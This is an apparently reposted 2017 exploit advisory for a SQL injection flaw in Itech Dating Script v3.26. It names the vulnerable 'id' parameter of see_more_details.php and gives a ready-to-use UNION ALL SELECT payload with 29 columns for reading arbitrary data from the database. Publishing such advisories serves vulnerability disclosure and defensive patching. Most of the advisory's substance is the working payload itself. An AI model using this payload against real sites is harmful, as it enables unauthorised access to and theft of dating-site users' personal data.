Itech Dating Script 3.26 SQL Injection

🗓️ 30 Jan 2017 00:00:00Reported by Kaan KAMISType

packetstorm🔗 packetstormsecurity.com👁 39 Views

Itech Dating Script v3.26 SQL Injection vulnerability allows attackers to read arbitrary data from the databas

`Exploit Title: Itech Dating Script v3.26 a SQL Injection  
Date: 30.01.2017  
Vendor Homepage: http://itechscripts.com/  
Software Link: http://itechscripts.com/dating-script/  
Exploit Author: Kaan KAMIS  
Contact: iletisim[at]k2an[dot]com  
Website: http://k2an.com  
Category: Web Application Exploits  
  
Overview  
  
Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.  
  
Type of vulnerability:  
  
An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read  
arbitrary data from the database.  
  
Vulnerability:  
  
URL : http://localhost/see_more_details.php?id=40[payload]  
  
Parameter: id (GET)  
Type: UNION query  
Title: Generic UNION query (NULL) - 29 columns  
Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs  
  
  
`

30 Jan 2017 00:00Current